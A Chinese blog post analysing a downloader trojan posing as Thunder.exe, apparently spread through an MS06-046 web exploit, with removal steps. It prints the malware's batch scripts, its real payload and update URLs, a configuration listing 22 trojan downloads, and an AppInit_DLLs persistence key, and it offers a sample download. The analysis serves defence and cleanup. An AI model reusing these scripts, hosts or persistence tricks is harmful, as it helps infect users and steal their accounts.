• 欢迎访问金刀客博客!
  • 2019,春节快乐!

假冒迅雷下载者病毒–Thunder.exe

病毒分析 admin 10825次浏览 已收录 1个评论

昨天因为有事情,在www.51job.com瞎逛,看有没有适合英语翻译的工作,不知道是在那个网页突然卡巴斯基报警说有病毒,今天检查了下发现网马是http://net.fql12.cn/lz.htm,肯定是一个下载者了。昨天我想卡巴都拦截了就没在意了。
今天我跑来办公室,一打开电脑,突然发现有提示,询问我是否启动Thunder.exe,我一看是迅雷啊,就觉得奇怪,但是还是点击了允许,差一点点击了建立永久规则,慢慢的我发觉不对了,怎么这个迅雷还建立系统服务的?后面的情况验证了我的猜测,这是一个彻彻底底的下载者病毒,并且是从http://net.fql12.cn/lz.htm上面感染的,哈哈,这个Thunder.exe下载者还是免杀的呢!卡巴2009对运行着的Thunder.exe没有丝毫的反应!!
lz.htm被卡巴拦截

附件中的lz.htm是MS06046网马,利用HHCtrl ActiveX控件堆溢出从完全控制用户电脑,过全补丁的windows xp sp2的IE6,而我正好是ie6的游览器,因而中招了,赶快升级到ie7吧!
这个网马的病毒下载地址解码出来是http://net.fql11.cn/n.exe,md5和Thunder.exe一样。
解密下载地址的方法是:
[html][/html]
(pub!1c的代码)
中毒症状:
1,把Thunder.exe放置到C:\Documents and Settings\Administrator\「开始」菜单\程序\启动文件夹下面,突破了卡巴斯基2009的主动防御,实现自启动,
2, 释放下载者主体文件c:\windows\fonts\F385D020.DLL,插入运行中的每个进程

3,复制自身到c:\windows\fonts\88199DC.EXE(随机命名),添加自身到系统服务,实现自启动,然后启动下载病毒,
copy2090000.bat

@echo off
copy /y "C:\DOCUMENTS AND SETTINGS\ALL USERS\「开始」菜单\程序\启动\THUNDER.EXE" "C:\WINDOWS\FONTS\A9A52EC8.EXE" >nul
del %0

del.bat

@echo off
:selfkill
del /F /Q "C:\DOCUMENTS AND SETTINGS\ALL USERS\「开始」菜单\程序\启动\THUNDER.EXE"
if exist "C:\DOCUMENTS AND SETTINGS\ALL USERS\「开始」菜单\程序\启动\THUNDER.EXE" goto selfkill
del %0


另外还复制自身到C:\Program Files\wsv.exe,这个应当是网马lz.htm的行为,没发现Thunder.exe有这个特征。
4,访问http://nx.yal99.cn/soft//update.txt获取病毒更新下载列表信息。

[update] ver=2008102711 url=http://nx.yal99.cn/soft/soft/acab7e5515e97a02.exe updatetimer=60
[startpage] startpage=0 url=ssssssssssssssssssss
[desktop] desktop=0 title1=ww url1=http:// count=1
[file]
file=1 file1=http://ad3.qcl10.cn/mh.exe filename1=ffsea1.exe ftime1=3
file2=http://ad3.qcl10.cn/wd.exe filename2=ffsea2.exe ftime2=3
file3=http://ad3.qcl10.cn/zt.exe filename3=ffsea3.exe ftime3=3
file4=http://ad3.qcl10.cn/my.exe filename4=ffsea4.exe ftime4=3
file5=http://ad3.qcl10.cn/dxc.exe filename5=ffsea5.exe ftime5=3
file6=http://ad3.qcl10.cn/wm.exe filename6=ffsea6.exe ftime6=3
file7=http://ad.qcl10.cn/jx.exe filename7=ffsea7.exe ftime7=3
file8=http://ad3.qcl10.cn/tl.exe filename8=ffsea8.exe ftime8=3
file9=http://ad3.qcl10.cn/qqhx.exe filename9=ffsea9.exe ftime9=3
file10=http://ad.qcl10.cn/zx.exe filename10=ffsea10.exe ftime10=3
file11=http://ad3.qcl10.cn/wow.exe filename11=ffsea11.exe ftime11=4
file12=http://ad3.qcl10.cn/xx.exe filename12=ffsea12.exe ftime12=4
file13=http://ad3.qcl10.cn/kdxy.exe filename13=ffsea13.exe ftime13=4
file14=http://ad3.qcl10.cn/cqwz.exe filename14=ffsea14.exe ftime14=4
file15=http://ad3.qcl10.cn/dj.exe filename15=ffsea15.exe ftime15=4
file16=http://ad3.qcl10.cn/jh.exe filename16=ffsea16.exe ftime16=4
file17=http://ad3.qcl10.cn/cs.exe filename17=ffsea17.exe ftime17=4
file18=http://ad3.qcl10.cn/dh.exe filename18=ffsea18.exe ftime18=4
file19=http://ad3.qcl10.cn/cb.exe filename19=ffsea19.exe ftime19=4
file20=http://ad3.qcl10.cn/mxd.exe filename20=ffsea20.exe ftime20=4
file21=http://ad.qcl10.cn/qqsg.exe filename21=ffsea21.exe ftime21=4
file22=http://ad3.qcl10.cn/cq.exe filename22=ffsea22.exe ftime22=4
count=22
[count] count=0 mecount=0 url=http://nx.yal99.cn/soft/count/count.asp

这个服务器位于温州

上面绑定的域名全部无实际内容,可以说这是一台完完全全的存放病毒的服务器
全是窃密的木马群

解决办法:
1,断开网络,防治病毒被修改是从网络上下载新病毒。
2,首先我们需要干掉下载者病毒,然后清除木马群。清除下载者的关键是找到他的系统监控程序,这里很显然就是插入每个进程的下载者c:\windows\fonts\F385D020.DLL。
3,打开icesword,设置-禁止进线程创建
然后强制删除c:\windows\fonts\F385D020.DLL
然后把禁止进线程前面的勾勾去掉,删除启动项中的Thunder
4,最重要的就是这里了,这个需要你安装好杀毒软件,全盘扫描掉木马群,
最经典的表现就是:
C:\WINDOWS\system32\delnice.dll
C:\WINDOWS\system32\delnicek.exe
C:\WINDOWS\system32\kandawf.dll
C:\WINDOWS\system32\qanhllao.dll
C:\WINDOWS\system32\xuntxn.dll
添加到appinit,hook几乎所有程序实现自启动

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="kandawf.dll delnice.dll qanhllao.dll xuntxn.dll"

映射文件为c:\windows\system32\kandawf.dll
这个onlinegames木马群基本上都有这个特征!因为这个木马群是随时变化的,别无统一的清除办法,如果杀毒软件清除不干净,只能扫描sreng日志,然后手动清除。
病毒样本下载:
纳米下载


金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明假冒迅雷下载者病毒–Thunder.exe
喜欢 (5)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到
(1)个小伙伴在吐槽
  1. 厉害,以后要常来你这里了,好哈学习!
    vikinglei2009-09-12 21:47 回复